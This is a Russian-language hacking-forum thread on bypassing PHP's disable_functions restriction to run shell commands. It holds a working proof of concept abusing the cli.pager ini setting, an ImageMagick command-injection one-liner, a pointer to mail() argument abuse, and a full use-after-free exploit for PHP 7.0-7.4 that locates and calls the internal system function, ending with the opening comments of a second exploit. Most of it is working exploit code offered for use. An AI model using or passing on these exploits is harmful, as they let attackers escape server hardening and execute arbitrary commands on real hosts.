Обход disable_functions

Discussion in 'База Знаний' started by l1ght, 13 Apr 2019.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    Обход disable_functions в php-cli

    Имеем штатный набор php.ini
    Code:
    disable_functions=exec,passthru,shell_exec,system,proc_open..i.t.d
    который обламывает выполнение команд
    system('id');
    Code:
    PHP Warning:  system() has been disabled for security reasons in /home/root2/backtrick/test.php on line 2
    нашел альтернативу здесь:
    https://github.com/php/php-src/blob/master/ext/readline/readline_cli.c
    Code:
    /*
       +----------------------------------------------------------------------+
       | PHP Version 7                                                        |
       +----------------------------------------------------------------------+
       | Copyright (c) The PHP Group                                          |
       +----------------------------------------------------------------------+
       | This source file is subject to version 3.01 of the PHP license,      |
       | that is bundled with this package in the file LICENSE, and is        |
       | available through the world-wide-web at the following url:           |
       | http://www.php.net/license/3_01.txt                                  |
       | If you did not receive a copy of the PHP license and are unable to   |
       | obtain it through the world-wide-web, please send a note to          |
       | [email protected] so we can mail you a copy immediately.               |
       +----------------------------------------------------------------------+
       | Author: Marcus Boerger <[email protected]>                               |
       |         Johannes Schlueter <[email protected]>                        |
       +----------------------------------------------------------------------+
    */
    
    #ifdef HAVE_CONFIG_H
    #include "config.h"
    #endif
    
    #include "php.h"
    
    #ifndef HAVE_RL_COMPLETION_MATCHES
    #define rl_completion_matches completion_matches
    #endif
    
    #include "php_globals.h"
    #include "php_variables.h"
    #include "zend_hash.h"
    #include "zend_modules.h"
    
    #include "SAPI.h"
    #include <locale.h>
    #include "zend.h"
    #include "zend_extensions.h"
    #include "php_ini.h"
    #include "php_globals.h"
    #include "php_main.h"
    #include "fopen_wrappers.h"
    #include "ext/standard/php_standard.h"
    #include "zend_smart_str.h"
    
    #ifdef __riscos__
    #include <unixlib/local.h>
    #endif
    
    #if HAVE_LIBEDIT
    #include <editline/readline.h>
    #else
    #include <readline/readline.h>
    #include <readline/history.h>
    #endif
    
    #include "zend_compile.h"
    #include "zend_execute.h"
    #include "zend_highlight.h"
    #include "zend_exceptions.h"
    
    #include "sapi/cli/cli.h"
    #include "readline_cli.h"
    
    #if defined(COMPILE_DL_READLINE) && !defined(PHP_WIN32)
    #include <dlfcn.h>
    #endif
    
    #ifndef RTLD_DEFAULT
    #define RTLD_DEFAULT NULL
    #endif
    
    #define DEFAULT_PROMPT "\\b \\> "
    
    ZEND_DECLARE_MODULE_GLOBALS(cli_readline);
    
    static char php_last_char = '\0';
    static FILE *pager_pipe = NULL;
    
    static size_t readline_shell_write(const char *str, size_t str_length) /* {{{ */
    {
       if (CLIR_G(prompt_str)) {
           smart_str_appendl(CLIR_G(prompt_str), str, str_length);
           return str_length;
       }
    
       if (CLIR_G(pager) && *CLIR_G(pager) && !pager_pipe) {
           pager_pipe = VCWD_POPEN(CLIR_G(pager), "w");
       }
       if (pager_pipe) {
           return fwrite(str, 1, MIN(str_length, 16384), pager_pipe);
       }
    
       return -1;
    }
    /* }}} */
    
    static size_t readline_shell_ub_write(const char *str, size_t str_length) /* {{{ */
    {
       /* We just store the last char here and then pass back to the
          caller (sapi_cli_single_write in sapi/cli) which will actually
          write due to -1 return code */
       php_last_char = str[str_length-1];
    
       return (size_t) -1;
    }
    /* }}} */
    
    static void cli_readline_init_globals(zend_cli_readline_globals *rg)
    {
       rg->pager = NULL;
       rg->prompt = NULL;
       rg->prompt_str = NULL;
    }
    
    PHP_INI_BEGIN()
       STD_PHP_INI_ENTRY("cli.pager", "", PHP_INI_ALL, OnUpdateString, pager, zend_cli_readline_globals, cli_readline_globals)
       STD_PHP_INI_ENTRY("cli.prompt", DEFAULT_PROMPT, PHP_INI_ALL, OnUpdateString, prompt, zend_cli_readline_globals, cli_readline_globals)
    PHP_INI_END()
    
    
    
    typedef enum {
       body,
       sstring,
       dstring,
       sstring_esc,
       dstring_esc,
       comment_line,
       comment_block,
       heredoc_start,
       heredoc,
       outside,
    } php_code_type;
    
    static zend_string *cli_get_prompt(char *block, char prompt) /* {{{ */
    {
       smart_str retval = {0};
       char *prompt_spec = CLIR_G(prompt) ? CLIR_G(prompt) : DEFAULT_PROMPT;
    
       do {
           if (*prompt_spec == '\\') {
               switch (prompt_spec[1]) {
               case '\\':
                   smart_str_appendc(&retval, '\\');
                   prompt_spec++;
                   break;
               case 'n':
                   smart_str_appendc(&retval, '\n');
                   prompt_spec++;
                   break;
               case 't':
                   smart_str_appendc(&retval, '\t');
                   prompt_spec++;
                   break;
               case 'e':
                   smart_str_appendc(&retval, '\033');
                   prompt_spec++;
                   break;
    
    
               case 'v':
                   smart_str_appends(&retval, PHP_VERSION);
                   prompt_spec++;
                   break;
               case 'b':
                   smart_str_appends(&retval, block);
                   prompt_spec++;
                   break;
               case '>':
                   smart_str_appendc(&retval, prompt);
                   prompt_spec++;
                   break;
               case '`':
                   smart_str_appendc(&retval, '`');
                   prompt_spec++;
                   break;
               default:
                   smart_str_appendc(&retval, '\\');
                   break;
               }
           } else if (*prompt_spec == '`') {
               char *prompt_end = strstr(prompt_spec + 1, "`");
               char *code;
    
               if (prompt_end) {
                   code = estrndup(prompt_spec + 1, prompt_end - prompt_spec - 1);
    
                   CLIR_G(prompt_str) = &retval;
                   zend_try {
                       zend_eval_stringl(code, prompt_end - prompt_spec - 1, NULL, "php prompt code");
                   } zend_end_try();
                   CLIR_G(prompt_str) = NULL;
                   efree(code);
                   prompt_spec = prompt_end;
               }
           } else {
               smart_str_appendc(&retval, *prompt_spec);
           }
       } while (++prompt_spec && *prompt_spec);
       smart_str_0(&retval);
       return retval.s;
    }
    /* }}} */
    
    static int cli_is_valid_code(char *code, size_t len, zend_string **prompt) /* {{{ */
    {
       int valid_end = 1, last_valid_end;
       int brackets_count = 0;
       int brace_count = 0;
       size_t i;
       php_code_type code_type = body;
       char *heredoc_tag = NULL;
       size_t heredoc_len;
    
       for (i = 0; i < len; ++i) {
           switch(code_type) {
               default:
                   switch(code[i]) {
                       case '{':
                           brackets_count++;
                           valid_end = 0;
                           break;
                       case '}':
                           if (brackets_count > 0) {
                               brackets_count--;
                           }
                           valid_end = brackets_count ? 0 : 1;
                           break;
                       case '(':
                           brace_count++;
                           valid_end = 0;
                           break;
                       case ')':
                           if (brace_count > 0) {
                               brace_count--;
                           }
                           valid_end = 0;
                           break;
                       case ';':
                           valid_end = brace_count == 0 && brackets_count == 0;
                           break;
                       case ' ':
                       case '\r':
                       case '\n':
                       case '\t':
                           break;
                       case '\'':
                           code_type = sstring;
                           break;
                       case '"':
                           code_type = dstring;
                           break;
                       case '#':
                           code_type = comment_line;
                           break;
                       case '/':
                           if (code[i+1] == '/') {
                               i++;
                               code_type = comment_line;
                               break;
                           }
                           if (code[i+1] == '*') {
                               last_valid_end = valid_end;
                               valid_end = 0;
                               code_type = comment_block;
                               i++;
                               break;
                           }
                           valid_end = 0;
                           break;
                       case '?':
                           if (code[i+1] == '>') {
                               i++;
                               code_type = outside;
                               break;
                           }
                           valid_end = 0;
                           break;
                       case '<':
                           valid_end = 0;
                           if (i + 2 < len && code[i+1] == '<' && code[i+2] == '<') {
                               i += 2;
                               code_type = heredoc_start;
                               heredoc_tag = NULL;
                               heredoc_len = 0;
                           }
                           break;
                       default:
                           valid_end = 0;
                           break;
                   }
                   break;
               case sstring:
                   if (code[i] == '\\') {
                       code_type = sstring_esc;
                   } else {
                       if (code[i] == '\'') {
                           code_type = body;
                       }
                   }
                   break;
               case sstring_esc:
                   code_type = sstring;
                   break;
               case dstring:
                   if (code[i] == '\\') {
                       code_type = dstring_esc;
                   } else {
                       if (code[i] == '"') {
                           code_type = body;
                       }
                   }
                   break;
               case dstring_esc:
                   code_type = dstring;
                   break;
               case comment_line:
                   if (code[i] == '\n') {
                       code_type = body;
                   }
                   break;
               case comment_block:
                   if (code[i-1] == '*' && code[i] == '/') {
                       code_type = body;
                       valid_end = last_valid_end;
                   }
                   break;
               case heredoc_start:
                   switch(code[i]) {
                       case ' ':
                       case '\t':
                       case '\'':
                           break;
                       case '\r':
                       case '\n':
                           if (heredoc_tag) {
                               code_type = heredoc;
                           } else {
                               /* Malformed heredoc without label */
                               code_type = body;
                           }
                           break;
                       default:
                           if (!heredoc_tag) {
                               heredoc_tag = code+i;
                           }
                           heredoc_len++;
                           break;
                   }
                   break;
               case heredoc:
                   ZEND_ASSERT(heredoc_tag);
                   if (code[i - (heredoc_len + 1)] == '\n' && !strncmp(code + i - heredoc_len, heredoc_tag, heredoc_len) && code[i] == '\n') {
                       code_type = body;
                   } else if (code[i - (heredoc_len + 2)] == '\n' && !strncmp(code + i - heredoc_len - 1, heredoc_tag, heredoc_len) && code[i-1] == ';' && code[i] == '\n') {
                       code_type = body;
                       valid_end = 1;
                   }
                   break;
               case outside:
                   if ((CG(short_tags) && !strncmp(code+i-1, "<?", 2))
                   ||  (i > 3 && !strncmp(code+i-4, "<?php", 5))
                   ) {
                       code_type = body;
                   }
                   break;
           }
       }
    
       switch (code_type) {
           default:
               if (brace_count) {
                   *prompt = cli_get_prompt("php", '(');
               } else if (brackets_count) {
                   *prompt = cli_get_prompt("php", '{');
               } else {
                   *prompt = cli_get_prompt("php", '>');
               }
               break;
           case sstring:
           case sstring_esc:
               *prompt = cli_get_prompt("php", '\'');
               break;
           case dstring:
           case dstring_esc:
               *prompt = cli_get_prompt("php", '"');
               break;
           case comment_block:
               *prompt = cli_get_prompt("/* ", '>');
               break;
           case heredoc:
               *prompt = cli_get_prompt("<<<", '>');
               break;
           case outside:
               *prompt = cli_get_prompt("   ", '>');
               break;
       }
    
       if (!valid_end || brackets_count) {
           return 0;
       } else {
           return 1;
       }
    }
    /* }}} */
    
    static char *cli_completion_generator_ht(const char *text, size_t textlen, int *state, HashTable *ht, void **pData) /* {{{ */
    {
       zend_string *name;
       zend_ulong number;
    
       if (!(*state % 2)) {
           zend_hash_internal_pointer_reset(ht);
           (*state)++;
       }
       while(zend_hash_has_more_elements(ht) == SUCCESS) {
           zend_hash_get_current_key(ht, &name, &number);
           if (!textlen || !strncmp(ZSTR_VAL(name), text, textlen)) {
               if (pData) {
                   *pData = zend_hash_get_current_data_ptr(ht);
               }
               zend_hash_move_forward(ht);
               return ZSTR_VAL(name);
           }
           if (zend_hash_move_forward(ht) == FAILURE) {
               break;
           }
       }
       (*state)++;
       return NULL;
    } /* }}} */
    
    static char *cli_completion_generator_var(const char *text, size_t textlen, int *state) /* {{{ */
    {
       char *retval, *tmp;
       zend_array *symbol_table = &EG(symbol_table);
    
       tmp = retval = cli_completion_generator_ht(text + 1, textlen - 1, state, symbol_table, NULL);
       if (retval) {
           retval = malloc(strlen(tmp) + 2);
           retval[0] = '$';
           strcpy(&retval[1], tmp);
           rl_completion_append_character = '\0';
       }
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_ini(const char *text, size_t textlen, int *state) /* {{{ */
    {
       char *retval, *tmp;
    
       tmp = retval = cli_completion_generator_ht(text + 1, textlen - 1, state, EG(ini_directives), NULL);
       if (retval) {
           retval = malloc(strlen(tmp) + 2);
           retval[0] = '#';
           strcpy(&retval[1], tmp);
           rl_completion_append_character = '=';
       }
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_func(const char *text, size_t textlen, int *state, HashTable *ht) /* {{{ */
    {
       zend_function *func;
       char *retval = cli_completion_generator_ht(text, textlen, state, ht, (void**)&func);
       if (retval) {
           rl_completion_append_character = '(';
           retval = strdup(ZSTR_VAL(func->common.function_name));
       }
    
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_class(const char *text, size_t textlen, int *state) /* {{{ */
    {
       zend_class_entry *ce;
       char *retval = cli_completion_generator_ht(text, textlen, state, EG(class_table), (void**)&ce);
       if (retval) {
           rl_completion_append_character = '\0';
           retval = strdup(ZSTR_VAL(ce->name));
       }
    
       return retval;
    } /* }}} */
    
    static char *cli_completion_generator_define(const char *text, size_t textlen, int *state, HashTable *ht) /* {{{ */
    {
       zend_class_entry **pce;
       char *retval = cli_completion_generator_ht(text, textlen, state, ht, (void**)&pce);
       if (retval) {
           rl_completion_append_character = '\0';
           retval = strdup(retval);
       }
    
       return retval;
    } /* }}} */
    
    static int cli_completion_state;
    
    static char *cli_completion_generator(const char *text, int index) /* {{{ */
    {
    /*
    TODO:
    - constants
    - maybe array keys
    - language constructs and other things outside a hashtable (echo, try, function, class, ...)
    - object/class members
    
    - future: respect scope ("php > function foo() { $[tab]" should only expand to local variables...)
    */
       char *retval = NULL;
       size_t textlen = strlen(text);
    
       if (!index) {
           cli_completion_state = 0;
       }
       if (text[0] == '$') {
           retval = cli_completion_generator_var(text, textlen, &cli_completion_state);
       } else if (text[0] == '#') {
           retval = cli_completion_generator_ini(text, textlen, &cli_completion_state);
       } else {
           char *lc_text, *class_name_end;
           zend_string *class_name = NULL;
           zend_class_entry *ce = NULL;
    
           class_name_end = strstr(text, "::");
           if (class_name_end) {
               size_t class_name_len = class_name_end - text;
               class_name = zend_string_alloc(class_name_len, 0);
               zend_str_tolower_copy(ZSTR_VAL(class_name), text, class_name_len);
               if ((ce = zend_lookup_class(class_name)) == NULL) {
                   zend_string_release_ex(class_name, 0);
                   return NULL;
               }
               lc_text = zend_str_tolower_dup(class_name_end + 2, textlen - 2 - class_name_len);
               textlen -= (class_name_len + 2);
           } else {
               lc_text = zend_str_tolower_dup(text, textlen);
           }
    
           switch (cli_completion_state) {
               case 0:
               case 1:
                   retval = cli_completion_generator_func(lc_text, textlen, &cli_completion_state, ce ? &ce->function_table : EG(function_table));
                   if (retval) {
                       break;
                   }
               case 2:
               case 3:
                   retval = cli_completion_generator_define(text, textlen, &cli_completion_state, ce ? &ce->constants_table : EG(zend_constants));
                   if (retval || ce) {
                       break;
                   }
               case 4:
               case 5:
                   retval = cli_completion_generator_class(lc_text, textlen, &cli_completion_state);
                   break;
               default:
                   break;
           }
           efree(lc_text);
           if (class_name) {
               zend_string_release_ex(class_name, 0);
           }
           if (ce && retval) {
               size_t len = ZSTR_LEN(ce->name) + 2 + strlen(retval) + 1;
               char *tmp = malloc(len);
    
               snprintf(tmp, len, "%s::%s", ZSTR_VAL(ce->name), retval);
               free(retval);
               retval = tmp;
           }
       }
    
       return retval;
    } /* }}} */
    
    static char **cli_code_completion(const char *text, int start, int end) /* {{{ */
    {
       return rl_completion_matches(text, cli_completion_generator);
    }
    /* }}} */
    
    static int readline_shell_run(void) /* {{{ */
    {
       char *line;
       size_t size = 4096, pos = 0, len;
       char *code = emalloc(size);
       zend_string *prompt = cli_get_prompt("php", '>');
       char *history_file;
       int history_lines_to_write = 0;
    
       if (PG(auto_prepend_file) && PG(auto_prepend_file)[0]) {
           zend_file_handle *prepend_file_p;
           zend_file_handle prepend_file;
    
           memset(&prepend_file, 0, sizeof(prepend_file));
           prepend_file.filename = PG(auto_prepend_file);
           prepend_file.opened_path = NULL;
           prepend_file.free_filename = 0;
           prepend_file.type = ZEND_HANDLE_FILENAME;
           prepend_file_p = &prepend_file;
    
           zend_execute_scripts(ZEND_REQUIRE, NULL, 1, prepend_file_p);
       }
    
    #ifndef PHP_WIN32
       history_file = tilde_expand("~/.php_history");
    #else
       spprintf(&history_file, MAX_PATH, "%s/.php_history", getenv("USERPROFILE"));
    #endif
       rl_attempted_completion_function = cli_code_completion;
    #ifndef PHP_WIN32
       rl_special_prefixes = "$";
    #endif
       read_history(history_file);
    
       EG(exit_status) = 0;
       while ((line = readline(ZSTR_VAL(prompt))) != NULL) {
           if (strcmp(line, "exit") == 0 || strcmp(line, "quit") == 0) {
               free(line);
               break;
           }
    
           if (!pos && !*line) {
               free(line);
               continue;
           }
    
           len = strlen(line);
    
           if (line[0] == '#') {
               char *param = strstr(&line[1], "=");
               if (param) {
                   zend_string *cmd;
                   param++;
                   cmd = zend_string_init(&line[1], param - &line[1] - 1, 0);
    
                   zend_alter_ini_entry_chars_ex(cmd, param, strlen(param), PHP_INI_USER, PHP_INI_STAGE_RUNTIME, 0);
                   zend_string_release_ex(cmd, 0);
                   add_history(line);
    
                   zend_string_release_ex(prompt, 0);
                   /* TODO: This might be wrong! */
                   prompt = cli_get_prompt("php", '>');
                   continue;
               }
           }
    
           if (pos + len + 2 > size) {
               size = pos + len + 2;
               code = erealloc(code, size);
           }
           memcpy(&code[pos], line, len);
           pos += len;
           code[pos] = '\n';
           code[++pos] = '\0';
    
           if (*line) {
               add_history(line);
               history_lines_to_write += 1;
           }
    
           free(line);
           zend_string_release_ex(prompt, 0);
    
           if (!cli_is_valid_code(code, pos, &prompt)) {
               continue;
           }
    
           if (history_lines_to_write) {
    #if HAVE_LIBEDIT
               write_history(history_file);
    #else
               append_history(history_lines_to_write, history_file);
    #endif
               history_lines_to_write = 0;
           }
    
           zend_try {
               zend_eval_stringl(code, pos, NULL, "php shell code");
           } zend_end_try();
    
           pos = 0;
    
           if (!pager_pipe && php_last_char != '\0' && php_last_char != '\n') {
               php_write("\n", 1);
           }
    
           if (EG(exception)) {
               zend_exception_error(EG(exception), E_WARNING);
           }
    
           if (pager_pipe) {
               fclose(pager_pipe);
               pager_pipe = NULL;
           }
    
           php_last_char = '\0';
       }
    #ifdef PHP_WIN32
       efree(history_file);
    #else
       free(history_file);
    #endif
       efree(code);
       zend_string_release_ex(prompt, 0);
       return EG(exit_status);
    }
    /* }}} */
    
    #ifdef PHP_WIN32
    typedef cli_shell_callbacks_t *(__cdecl *get_cli_shell_callbacks)(void);
    #define GET_SHELL_CB(cb) \
       do { \
           get_cli_shell_callbacks get_callbacks; \
           HMODULE hMod = GetModuleHandle("php.exe"); \
           (cb) = NULL; \
           if (strlen(sapi_module.name) >= 3 && 0 == strncmp("cli", sapi_module.name, 3)) { \
               get_callbacks = (get_cli_shell_callbacks)GetProcAddress(hMod, "php_cli_get_shell_callbacks"); \
               if (get_callbacks) { \
                   (cb) = get_callbacks(); \
               } \
           } \
       } while(0)
    
    #else
    /*
    #ifdef COMPILE_DL_READLINE
    This dlsym() is always used as even the CGI SAPI is linked against "CLI"-only
    extensions. If that is being changed dlsym() should only be used when building
    this extension sharedto offer compatibility.
    */
    #define GET_SHELL_CB(cb) \
       do { \
           (cb) = NULL; \
           cli_shell_callbacks_t *(*get_callbacks)(); \
           get_callbacks = dlsym(RTLD_DEFAULT, "php_cli_get_shell_callbacks"); \
           if (get_callbacks) { \
               (cb) = get_callbacks(); \
           } \
       } while(0)
    /*#else
    #define GET_SHELL_CB(cb) (cb) = php_cli_get_shell_callbacks()
    #endif*/
    #endif
    
    PHP_MINIT_FUNCTION(cli_readline)
    {
       cli_shell_callbacks_t *cb;
    
       ZEND_INIT_MODULE_GLOBALS(cli_readline, cli_readline_init_globals, NULL);
       REGISTER_INI_ENTRIES();
    
    #if HAVE_LIBEDIT
       REGISTER_STRING_CONSTANT("READLINE_LIB", "libedit", CONST_CS|CONST_PERSISTENT);
    #else
       REGISTER_STRING_CONSTANT("READLINE_LIB", "readline", CONST_CS|CONST_PERSISTENT);
    #endif
    
       GET_SHELL_CB(cb);
       if (cb) {
           cb->cli_shell_write = readline_shell_write;
           cb->cli_shell_ub_write = readline_shell_ub_write;
           cb->cli_shell_run = readline_shell_run;
       }
    
       return SUCCESS;
    }
    
    PHP_MSHUTDOWN_FUNCTION(cli_readline)
    {
       cli_shell_callbacks_t *cb;
    
       UNREGISTER_INI_ENTRIES();
    
       GET_SHELL_CB(cb);
       if (cb) {
           cb->cli_shell_write = NULL;
           cb->cli_shell_ub_write = NULL;
           cb->cli_shell_run = NULL;
       }
    
       return SUCCESS;
    }
    
    PHP_MINFO_FUNCTION(cli_readline)
    {
       php_info_print_table_start();
       php_info_print_table_header(2, "Readline Support", "enabled");
    #ifdef PHP_WIN32
       php_info_print_table_row(2, "Readline library", "WinEditLine");
    #else
       php_info_print_table_row(2, "Readline library", (rl_library_version ? rl_library_version : "Unknown"));
    #endif
       php_info_print_table_end();
    
       DISPLAY_INI_ENTRIES();
    }
    нас интересует
    Code:
    static size_t readline_shell_write(const char *str, size_t str_length) /* {{{ */
    {
       if (CLIR_G(prompt_str)) {
           smart_str_appendl(CLIR_G(prompt_str), str, str_length);
           return str_length;
       }
    
       if (CLIR_G(pager) && *CLIR_G(pager) && !pager_pipe) {
           pager_pipe = VCWD_POPEN(CLIR_G(pager), "w");
       }
       if (pager_pipe) {
           return fwrite(str, 1, MIN(str_length, 16384), pager_pipe);
       }
    
       return -1;
    }
    Code:
    STD_PHP_INI_ENTRY("cli.pager", "", PHP_INI_ALL, OnUpdateString, pager, zend_cli_readline_globals, cli_readline_globals)
    cli.pager - одна из дирректив readline
    https://www.php.net/manual/ru/readline.configuration.php

    poc:
    Code:
    <?php
    echo "system:".system('id');
    ini_set('cli.pager','id;pwd');
    print_r(readline_info());
    проверяем:
    Code:
    php -d disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source test.php
    =>
    Code:
    PHP Warning:  system() has been disabled for security reasons in /home/root2/backtrick/test.php on line 2
    system:Array
    (
       [line_buffer] =>
       [point] => 0
       [end] => 0
       [library_version] => EditLine wrapper
       [readline_name] =>
       [attempted_completion_over] => 0
    )
    uid=0(root) gid=0(root) groups=0(root)
    /home/root2/backtrick
    php >=5.4.0
     
    #1 l1ght, 13 Apr 2019
    Last edited by a moderator: 30 Jan 2020
  2. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    428
    Likes Received:
    579
    Reputations:
    52
    У функции mail() ещё есть пятый аргумент в котором указываются опции sendmail. С помощью этих опций тоже можно выполнить команду. Но тут всё зависит от реализации sendmail. На одном сервере она может предоставляться через postfix, на другом через exim. Сам этот метод ещё не пробовал, но видел статью в котором о нём рассказывается.

    Вообще через пятый аргумент mail() можно много чего наделать: https://www.saotn.org/exploit-phps-mail-get-remote-code-execution/
     
    dmax0fw, b3, BillyBons and 1 other person like this.
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,420
    Likes Received:
    814
    Reputations:
    851
    _________________________
    joelblack likes this.
  4. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    912
    Likes Received:
    474
    Reputations:
    723
    _________________________
    winstrool, grimnir, joelblack and 2 others like this.
  5. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,109
    Likes Received:
    800
    Reputations:
    231
  6. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    577
    Likes Received:
    1,113
    Reputations:
    374
    ImageMagick <= 6.9.3 (с пропатченным ImageTragick/GhostScript)

    PHP:
    new Imagick('scan:"|ls>/tmp/lol;"');
     
    #6 crlf, 21 Aug 2019
    Last edited: 22 Aug 2019
  7. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    577
    Likes Received:
    1,113
    Reputations:
    374
    PHP 7.0-7.4 disable_functions bypass

    https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass

    PHP 7.0-7.4 disable_functions bypass
    This exploit uses a two year old bug in debug_backtrace() function. We can trick it into returning a reference to a variable that has been destroyed, causing a use-after-free vulnerability. The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.

    Targets
    • 7.0 - all versions to date
    • 7.1 - all versions to date
    • 7.2 - all versions to date
    • 7.3 - all versions to date
    • 7.4 - all versions to date
    PHP:
    <?php

    # PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
    #
    # Bug: https://bugs.php.net/bug.php?id=76047
    # debug_backtrace() returns a reference to a variable
    # that has been destroyed, causing a UAF vulnerability.
    #
    # This exploit should work on all PHP 7.0-7.4 versions
    # released as of 30/01/2020.
    #
    # Author: https://github.com/mm0r1

    pwn("uname -a");

    function 
    pwn($cmd) {
       global 
    $abc$helper$backtrace;

       class 
    Vuln {
           public 
    $a;
           public function 
    __destruct() {
               global 
    $backtrace;
               unset(
    $this->a);
               
    $backtrace = (new Exception)->getTrace(); # ;)
               
    if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
                   
    $backtrace debug_backtrace();
               }
           }
       }

       class 
    Helper {
           public 
    $a$b$c$d;
       }

       function 
    str2ptr(&$str$p 0$s 8) {
           
    $address 0;
           for(
    $j $s-1$j >= 0$j--) {
               
    $address <<= 8;
               
    $address |= ord($str[$p+$j]);
           }
           return 
    $address;
       }

       function 
    ptr2str($ptr$m 8) {
           
    $out "";
           for (
    $i=0$i $m$i++) {
               
    $out .= chr($ptr 0xff);
               
    $ptr >>= 8;
           }
           return 
    $out;
       }

       function 
    write(&$str$p$v$n 8) {
           
    $i 0;
           for(
    $i 0$i $n$i++) {
               
    $str[$p $i] = chr($v 0xff);
               
    $v >>= 8;
           }
       }

       function 
    leak($addr$p 0$s 8) {
           global 
    $abc$helper;
           
    write($abc0x68$addr $p 0x10);
           
    $leak strlen($helper->a);
           if(
    $s != 8) { $leak %= << ($s 8) - 1; }
           return 
    $leak;
       }

       function 
    parse_elf($base) {
           
    $e_type leak($base0x102);

           
    $e_phoff leak($base0x20);
           
    $e_phentsize leak($base0x362);
           
    $e_phnum leak($base0x382);

           for(
    $i 0$i $e_phnum$i++) {
               
    $header $base $e_phoff $i $e_phentsize;
               
    $p_type  leak($header04);
               
    $p_flags leak($header44);
               
    $p_vaddr leak($header0x10);
               
    $p_memsz leak($header0x28);

               if(
    $p_type == && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                   # handle pie
                   
    $data_addr $e_type == $p_vaddr $base $p_vaddr;
                   
    $data_size $p_memsz;
               } else if(
    $p_type == && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                   
    $text_size $p_memsz;
               }
           }

           if(!
    $data_addr || !$text_size || !$data_size)
               return 
    false;

           return [
    $data_addr$text_size$data_size];
       }

       function 
    get_basic_funcs($base$elf) {
           list(
    $data_addr$text_size$data_size) = $elf;
           for(
    $i 0$i $data_size 8$i++) {
               
    $leak leak($data_addr$i 8);
               if(
    $leak $base && $leak $base $data_addr $base) {
                   
    $deref leak($leak);
                   
    # 'constant' constant check
                   
    if($deref != 0x746e6174736e6f63)
                       continue;
               } else continue;

               
    $leak leak($data_addr, ($i 4) * 8);
               if(
    $leak $base && $leak $base $data_addr $base) {
                   
    $deref leak($leak);
                   
    # 'bin2hex' constant check
                   
    if($deref != 0x786568326e6962)
                       continue;
               } else continue;

               return 
    $data_addr $i 8;
           }
       }

       function 
    get_binary_base($binary_leak) {
           
    $base 0;
           
    $start $binary_leak 0xfffffffffffff000;
           for(
    $i 0$i 0x1000$i++) {
               
    $addr $start 0x1000 $i;
               
    $leak leak($addr07);
               if(
    $leak == 0x10102464c457f) { # ELF header
                   
    return $addr;
               }
           }
       }

       function 
    get_system($basic_funcs) {
           
    $addr $basic_funcs;
           do {
               
    $f_entry leak($addr);
               
    $f_name leak($f_entry06);

               if(
    $f_name == 0x6d6574737973) { # system
                   
    return leak($addr 8);
               }
               
    $addr += 0x20;
           } while(
    $f_entry != 0);
           return 
    false;
       }

       function 
    trigger_uaf($arg) {
           
    # str_shuffle prevents opcache string interning
           
    $arg str_shuffle(str_repeat('A'79));
           
    $vuln = new Vuln();
           
    $vuln->$arg;
       }

       if(
    stristr(PHP_OS'WIN')) {
           die(
    'This PoC is for *nix systems only.');
       }

       
    $n_alloc 10# increase this value if UAF fails
       
    $contiguous = [];
       for(
    $i 0$i $n_alloc$i++)
           
    $contiguous[] = str_shuffle(str_repeat('A'79));

       
    trigger_uaf('x');
       
    $abc $backtrace[1]['args'][0];

       
    $helper = new Helper;
       
    $helper->= function ($x) { };

       if(
    strlen($abc) == 79 || strlen($abc) == 0) {
           die(
    "UAF failed");
       }

       
    # leaks
       
    $closure_handlers str2ptr($abc0);
       
    $php_heap str2ptr($abc0x58);
       
    $abc_addr $php_heap 0xc8;

       
    # fake value
       
    write($abc0x602);
       
    write($abc0x706);

       
    # fake reference
       
    write($abc0x10$abc_addr 0x60);
       
    write($abc0x180xa);

       
    $closure_obj str2ptr($abc0x20);

       
    $binary_leak leak($closure_handlers8);
       if(!(
    $base get_binary_base($binary_leak))) {
           die(
    "Couldn't determine binary base address");
       }

       if(!(
    $elf parse_elf($base))) {
           die(
    "Couldn't parse ELF header");
       }

       if(!(
    $basic_funcs get_basic_funcs($base$elf))) {
           die(
    "Couldn't get basic_functions address");
       }

       if(!(
    $zif_system get_system($basic_funcs))) {
           die(
    "Couldn't get zif_system address");
       }

       
    # fake closure object
       
    $fake_obj_offset 0xd0;
       for(
    $i 0$i 0x110$i += 8) {
           
    write($abc$fake_obj_offset $ileak($closure_obj$i));
       }

       
    # pwn
       
    write($abc0x20$abc_addr $fake_obj_offset);
       
    write($abc0xd0 0x3814); # internal func type
       
    write($abc0xd0 0x68$zif_system); # internal func handler

       
    ($helper->b)($cmd);
       exit();
    }
     
  8. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    204
    Likes Received:
    649
    Reputations:
    116
    https://ssd-disclosure.com/ssd-advisory-php-spldoublylinkedlist-uaf-sandbox-escape/
    https://bugs.php.net/bug.php?id=80111
    PHP:
    <?php
    #
    # PHP SplDoublyLinkedList::offsetUnset UAF
    # Charles Fol (@cfreal_)
    # 2020-08-07
    # PHP is vulnerable from 5.3 to 8.0 alpha
    # This exploit only targets PHP7+.
    #
    # SplDoublyLinkedList is a doubly-linked list (DLL) which supports iteration.
    # Said iteration is done by keeping a pointer to the "current" DLL element.
    # You can then call next() or prev() to make the DLL point to another element.
    # When you delete an element of the DLL, PHP will remove the element from the
    # DLL, then destroy the zval, and finally clear the current ptr if it points
    # to the element. Therefore, when the zval is destroyed, current is still
    # pointing to the associated element, even if it was removed from the list.
